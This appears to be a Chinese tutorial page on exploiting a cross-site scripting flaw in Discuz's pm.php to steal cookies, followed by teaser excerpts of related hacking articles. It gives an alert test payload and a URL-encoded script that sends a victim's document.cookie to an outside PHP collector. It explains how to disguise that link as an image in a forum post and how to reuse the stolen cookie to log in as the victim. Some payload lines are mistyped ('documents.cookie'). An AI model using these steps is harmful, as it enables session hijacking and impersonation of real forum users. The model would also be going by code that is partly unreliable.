跨站脚本攻击+Cookies欺骗(Discuz篇)_漏洞研究

这次我拿Discuz示范给大家看,首先我们都知道,Discuz在pm.php的程式中,并没有对   

会员名字做过滤,导致我们可以写入一些script.   

聪明的同学们,想到了吗?我们正可以利用这个漏洞写一段获取cookies的script.   

这是要像看到颜色 就会反应的!(取自 数学补习班= =")   

所以我们先从本端 获取自己cookies看看...   

例句:   

http://www.abc.com/pm.php?action=send&username=看啥?"><script>alert(documents.cookie)</script><   

OK? 接下来 我们为了要获取别人的cookies 所以采用跨站台的方式,   

首先把让对方看了我们精心构制好的URL.连了之后会到我们构制好的php or asp 程式里面.   

并把对方自己的cookies写入 我们的程式中...(如果需要 请googles搜寻 大陆狗 那边一堆)...   

所以啦~获取到对方cookies之后,我们找自己在该论坛的cookies记录..   

找到之后 把cookies里面的资讯改成对方的使用者名称,以及加密过的md5码...   

切记md5码是不可以反逆的~   

现在我把原理说完ㄌ...开始实战吧~~小杂碎 快来阿!   

现在已经知道pm.php的bug. 我们也已经把php程式上传准备完成.   

接下来 我们到论坛发link! P.S. 有些论坛 还可以利用 头像 来欺骗...   

全看个人的思维....(想起数学老师ㄌ= =")   

我贴了个问电脑问题的文章连结,并附上图片...(嘿嘿重点在图片拉~)   

我假设有一个假网址,http://myweb.hinet.net/uarestupid/home1/XXX.jpg   

随便你写 只要看起来像个图片 连结就够了....   

并把http://myweb.hinet.net/uarestupid/home1/XXX.jpg加上我们漏洞的连结,   

所以看起来就是这样:   

http://myweb.hinet.net/uarestupid/home1/XXX.jpg   

以上这段图片link看起来大家都毫不考虑的认为真的是图片...   

其实连结到,   

http://www.abc.com/pm.php?action=send&username=fuck%22%3E%3Cscript%3Ewindow.open("%68%74%74%70%3A%2F%2F%6D%65%6D%62%65%72%73%2E%6C%79%63%6F%73%2E%63%6F%2E%75%6B%2F%6A%65%72%65%6D%79%68%63%77%2F%68%2E%70%68%70?"%2Bdocuments.cookie)%3C/script%3E%3Cb%22   

以上我已经url编码过了,用功的同学用cookies搜一下吧...   

所以呢 他按了图片连结后....把自己的cookies送出去了 = =" 但是他还是可以看到图片...  

时间: 2024-08-03 07:00:18

跨站脚本攻击+Cookies欺骗(Discuz篇)_漏洞研究的相关文章

缓冲区溢出:十年来攻击和防卫的弱点_漏洞研究

摘要: 在过去的十年中,以缓冲区溢出为类型的安全漏洞占是最为 常见的一种形式了.更为严重的是,缓冲区溢出漏洞占了远程网 络攻击的绝大多数,这种攻击可以使得一个匿名的Internet用户 有机会获得一台主机的部分或全部的控制权!如果能有效地消除 缓冲区溢出的漏洞,则很大一部分的安全威胁可以得到缓解.在 本文中,我们研究了各种类型的缓冲区溢出漏洞和攻击手段,同 时我们也研究了各种的防御手段,这些手段用来消除这些漏洞所 造成的影响,其中包括我们自己的堆栈保护方法.然后我们要考 虑如何在保证现有系统功能

解密DDoS攻击——“缓存溢出”新变形_漏洞研究

在windows系统中,同样存在着缓存溢出的问题.而且,随着internet的普及,win系列平台上的internet服务程序越来越多,低水平的win程序就成为你系统上的致命伤,因为它们同样会发生远程堆栈溢出.而且,由于win系统使用者和管理者普遍缺乏安全防范意识,一台win系统上的堆栈溢出,如果被恶意利用,将导致整个机器被黑客所控制,进而可能导致整个局域网落入黑客之手.在微软的产品iis server4.0中就被发现存在一种被称为"非法htr请求"的缺陷.据微软称,此缺陷在特定情况下

fckeditor的漏洞详细篇_漏洞研究

GOOGLE: inurl:Fckeditor/editor 存在洞:filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp 修改Type IMAGE >>> ../ 上传..OK

当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)_漏洞研究

今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图!  列表得到WEBSHELL!(图)_漏洞研究-数据库备份拿shell">  里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们

UBB的跨站脚本攻击的漏洞_漏洞研究

近日,由于发现一些站点仍然存在UBB的跨站脚本攻击的漏洞.跨站脚本攻击虽然很少会对服务器造成一些什么比较大的影响,但对于一个站点来说,存在这种漏洞实在是太不值得!小则,弹点 什么东东出来;中则改改主页;重则窃取用户的COOKIES资料,更甚者将会G掉浏览者的硬盘.一个站点被变成一个恶意网站,还有谁敢来?如果再加上该站的站长比较"盲"一些,岂不乱套了?  小小的一段代码就真的能使一个站点成这样?好叫我们来具体的看看所谓的跨站脚本攻击到底会成为什么样的攻击模式.进入一个含UBB功能的站点比

研究UBB的跨站脚本攻击之综合篇_漏洞研究

近日,由于发现一些站点仍然存在UBB的跨站脚本攻击的漏洞.跨站脚本攻击虽然很少会对服务器造成一些什么比较大的影响,但对于一个站点来说,存在这种漏洞实在是太不值得!小则,弹点什么东东出来;中则改改主页;重则窃取用户的COOKIES资料,更甚者将会G掉浏览者的硬盘.一个站点被变成一个恶意网站,还有谁敢来?如果再加上该站的站长比较"盲"一些,岂不乱套了?  小小的一段代码就真的能使一个站点成这样?好叫我们来具体的看看所谓的跨站脚本攻击到底会成为什么样的攻击模式.进入一个含UBB功能的站点,比

最新的黑客技术:XSS跨站脚本攻击详细介绍_漏洞研究

总体上介绍 简单介绍什么是XSS攻击 如何寻找XSS漏洞 对于XSS攻击的总体思路 来自内部的攻击: 如何寻找内部的XSS漏洞 如何构造攻击 如何利用 结何实例攻击,如DVBBS&BBSXP 来自外部的攻击 如何构造XSS攻击 如何欺骗管理员打开 XSS与其它技术的结何 与mssql injection的结合 QQ跨站的结何 国内大型统计网站的跨站漏洞 社会工程学 制作恐怖的flash木马 制作方法由李丰初写 总结  正文: XSS总体介绍 什么是XSS攻击 XSS又叫CSS  (Cross S

字符集导致的浏览器跨站脚本攻击分析_漏洞研究

|=-------------------------------–=| |=-----–=[ 字符集导致的浏览器跨站脚本攻击 ]=-----–=| |=-------------------------------–=| |=-------------=[ By jianxin ]=------------=| |=-----------=[ jianxin@80sec.com ]=----------=| |=--------------------------------=| 文中<已经被

跨站脚本说明_漏洞研究

以前看过分析家写过一篇文章,介绍跨站脚本的安全隐患,当时只是知道有这样的   问题,也没有仔细阅读,目前此类问题经常在一些安全站点发布,偶刚好看到这样一篇文章   ,   抱着知道总比不知道好的想法,翻译整理了一下,原文在偶主页的collection目录里,错误   之处请   多多指点.   OK,go............   什么是跨站脚本(CSS/XSS)?   我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该   页面是可信赖的,但是当浏览器下